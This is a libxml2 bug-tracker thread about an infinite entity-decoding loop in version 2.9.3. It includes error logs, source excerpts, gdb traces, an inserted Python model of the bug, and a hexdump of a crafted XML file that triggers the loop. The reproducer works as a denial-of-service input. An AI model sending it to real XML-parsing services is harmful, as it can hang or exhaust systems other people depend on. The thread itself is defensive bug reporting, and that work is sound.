GNOME Bugzilla – Bug 759675
Infinite loop in xmlStringDecodeEntities
Last modified: 2017-02-08 19:21:54 UTC
Created attachment 317674 [details]
normalized testcase (not minimal)

Hi,

The following infinite recursion (Denial of Service) appears to exist in xmlStringDecodeEntities at parser.c:2864, on Libxml2 stable release 2.9.3:

c02_id0062.min:3: parser error : xmlParseStringPEReference: no name
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : xmlParseStringPEReference: no name
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : xmlParseStringPEReference: no name
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : xmlParseStringPEReference: no name
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : Detected an entity reference loop
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : xmlParseStringPEReference: no name
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : Detected an entity reference loop
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : xmlParseStringPEReference: no name
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : xmlParseStringPEReference: no name
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : xmlParseStringPEReference: no name
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000
^
c02_id0062.min:3: parser error : Detected an entity reference loop
w00000~00% %nitf;l-0sae"0C-i00000000000000000000000000000000000000000000000000

Reproducer as attached. An interrupted stack trace:
Correction: issue seems to be in xmlStringLenDecodeEntities rather than xmlStringDecodeEntities in the report title:

Line 2859:

    if (ent != NULL) {
        if (ent->content == NULL) {
            xmlLoadEntityContent(ctxt, ent);
        }
        ctxt->depth++;
        rep = xmlStringDecodeEntities(ctxt, ent->content, what, 0, 0, 0);
        ctxt->depth--;

ent->content gets reset to the original xml content.
A near minimal reproducer:

$ xxd -g 1 c02_id0062.min2
0000000: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31  <?xml version="1
0000010: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53  .0" encoding="IS
0000020: 4f 38 38 35 39 31 22 3f 3e 3c 21 44 4f 43 54 59  O88591"?><!DOCTY
0000030: 50 45 65 20 50 55 42 4c 49 43 20 22 31 22 20 22  PEe PUBLIC "1" "
0000040: 64 64 4e 73 22 5b 3c 21 45 4e 54 49 54 59 20 25  ddNs"[<!ENTITY %
0000050: 20 6e 69 74 66 20 53 59 53 54 45 4d 20 22 22 3e   nitf SYSTEM "">
0000060: 3c 21 45 4e 54 49 54 59 20 66 30 4d 20 22 30 22  <!ENTITY f0M "0"
0000070: 3e 0a 3c 21 45 4e 54 49 54 59 20 4d 20 22 25 6e  >.<!ENTITY M "%n
0000080: 69 74 66 3b 30 0a 77 30 30 30 30 30 7e 30 30 25  itf;0.w00000~00%
0000090: 20 25 6e 69 74 66 3b 8e 6c 2d 30 73 61 65 22 30   %nitf;.l-0sae"0
00000a0: 43 2d 69 30 30 30 30 30 30 30                    C-i0000000

$ echo $GXML
~/libxml2_gdb/bin/xmllint
$ gdb -q $GXML
Reading symbols from ~/libxml2_gdb/bin/xmllint...done.
(gdb) b xmlStringLenDecodeEntities
Breakpoint 1 at 0x806186c: file parser.c, line 2743.
(gdb) command
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>silent
>print "xmlStringLenDecodeEntities"
>x $esp
>cont
>end
(gdb) r c02_id0062.min2 > /dev/null 2>&1
Starting program: ~/libxml2_gdb/bin/xmllint c02_id0062.min2 > /dev/null 2>&1
$1 = "xmlStringLenDecodeEntities"
0xbfffd740:     0x081c1180
$2 = "xmlStringLenDecodeEntities"
0xbfffd740:     0x00000000
$3 = "xmlStringLenDecodeEntities"
0xbfffd650:     0x00000000
$4 = "xmlStringLenDecodeEntities"
0xbfffd520:     0x081d4098
$5 = "xmlStringLenDecodeEntities"
0xbfffd560:     0x00000000
$6 = "xmlStringLenDecodeEntities"
0xbfffd470:     0x00000000
$7 = "xmlStringLenDecodeEntities"
0xbfffd380:     0x00000000
....
$11066 = "xmlStringLenDecodeEntities"
0xbfffb850:     0x00000000
$11067 = "xmlStringLenDecodeEntities"
0xbfffb760:     0x00000000
....
$117249 = "xmlStringLenDecodeEntities"
0xbfffb1c0:     0x00000000
$117250 = "xmlStringLenDecodeEntities"
0xbfffb0d0:     0x00000000
$117251 = "xmlStringLenDecodeEntities"
0xbfffb0d0:     0x081c0258
$117252 = "xmlStringLenDecodeEntities"
0xbfffb2b0:     0x00000000
$117253 = "xmlStringLenDecodeEntities"
0xbfffb1c0:     0x00000000
....

Not strictly a recursion stack overflow issue as $esp starts rewinding after a while ..
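As an added illustration of the mechanism the two comments above describe (a constructed Python model, not libxml2's code): an external parameter entity whose content is reloaded on every reference, and whose loaded content is the document that references it again. A depth counter that is decremented on return, like the quoted ctxt->depth++/ctxt->depth-- pair, only bounds the stack; the "entity reference loop" error fires at the leaves while expansion restarts at every sibling reference, which matches the repeated errors and the rewinding $esp, whereas marking an entity as currently being expanded stops it at the first re-entry. The names Ctx, decode and run, the regex, the entity table and the trimmed DOCUMENT are my assumptions.

```python
import re

# Constructed model of the mechanism the comments above describe; not libxml2 code.
PE_REF = re.compile(r"%([A-Za-z_][\w.-]*);")   # a %name; parameter-entity reference

# Constructed: the declarations from the ASCII part of the reproducer above. Loading
# the SYSTEM "" entity hands back this document, as the report observes.
DOCUMENT = ('<!ENTITY % nitf SYSTEM "">\n'
            '<!ENTITY M "%nitf;0\nw00000~00% %nitf;l-0sae">')

class Ctx:
    def __init__(self, guard, max_depth):
        self.guard, self.max_depth = guard, max_depth   # guard: "depth" | "in_progress"
        self.depth = 0            # models ctxt->depth
        self.expanding = set()    # entities whose content is currently being decoded
        self.calls, self.errors = 0, []   # decode() invocations, cf. the gdb hit count

def decode(ctx, text, entities):
    """Expand %name; references in text, recursing into each referenced entity."""
    ctx.calls += 1
    out, pos = [], 0
    for m in PE_REF.finditer(text):
        out.append(text[pos:m.start()])
        pos, name = m.end(), m.group(1)
        ent = entities[name]
        if ent["content"] is None:               # external entity: load it now
            ent["content"] = DOCUMENT
        if ctx.guard == "in_progress" and name in ctx.expanding:
            ctx.errors.append("loop: " + name)   # cycle caught at the first re-entry
            continue
        if ctx.depth >= ctx.max_depth:
            ctx.errors.append("depth: " + name)  # bounds the stack, not the total work
            continue
        ctx.depth += 1
        ctx.expanding.add(name)
        out.append(decode(ctx, ent["content"], entities))
        ctx.expanding.discard(name)
        ctx.depth -= 1
        ent["content"] = None                    # reset, so the next reference reloads
    out.append(text[pos:])
    return "".join(out)

def run(guard, max_depth=6):
    """Decode entity M's literal value; returns (number of decode calls, errors)."""
    entities = {"nitf": {"content": None},
                "M": {"content": '%nitf;0\nw00000~00% %nitf;l-0sae'}}
    ctx = Ctx(guard, max_depth)
    decode(ctx, entities["M"]["content"], entities)
    return ctx.calls, ctx.errors
```

With a depth limit of 6, run("depth") makes 127 decode calls and reports 128 depth errors (the work doubles with every extra level), while run("in_progress") makes 3 calls and reports the loop 4 times.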
How to reproduce?
You may use the reproducer in the hexdump, just the ASCII part of c02_id0062.min2:

$ xxd -g 1 c02_id0062.min2
0000000: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31  <?xml version="1
0000010: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53  .0" encoding="IS
0000020: 4f 38 38 35 39 31 22 3f 3e 3c 21 44 4f 43 54 59  O88591"?><!DOCTY
0000030: 50 45 65 20 50 55 42 4c 49 43 20 22 31 22 20 22  PEe PUBLIC "1" "
0000040: 64 64 4e 73 22 5b 3c 21 45 4e 54 49 54 59 20 25  ddNs"[<!ENTITY %
0000050: 20 6e 69 74 66 20 53 59 53 54 45 4d 20 22 22 3e   nitf SYSTEM "">
0000060: 3c 21 45 4e 54 49 54 59 20 66 30 4d 20 22 30 22  <!ENTITY f0M "0"
0000070: 3e 0a 3c 21 45 4e 54 49 54 59 20 4d 20 22 25 6e  >.<!ENTITY M "%n
0000080: 69 74 66 3b 30 0a 77 30 30 30 30 30 7e 30 30 25  itf;0.w00000~00%
0000090: 20 25 6e 69 74 66 3b 8e 6c 2d 30 73 61 65 22 30   %nitf;.l-0sae"0
00000a0: 43 2d 69 30 30 30 30 30 30 30                    C-i0000000
Bisecting libxml2, this was fixed by:

Bug 761430: xmlReadMemory causes file and network access
<https://bugzilla.gnome.org/show_bug.cgi?id=761430>
<https://git.gnome.org/browse/libxml2/commit/?id=b1d34de46a11323fccffa9fadeb33be670d602f5>

Duping to that bug.

*** This bug has been marked as a duplicate of bug 761430 ***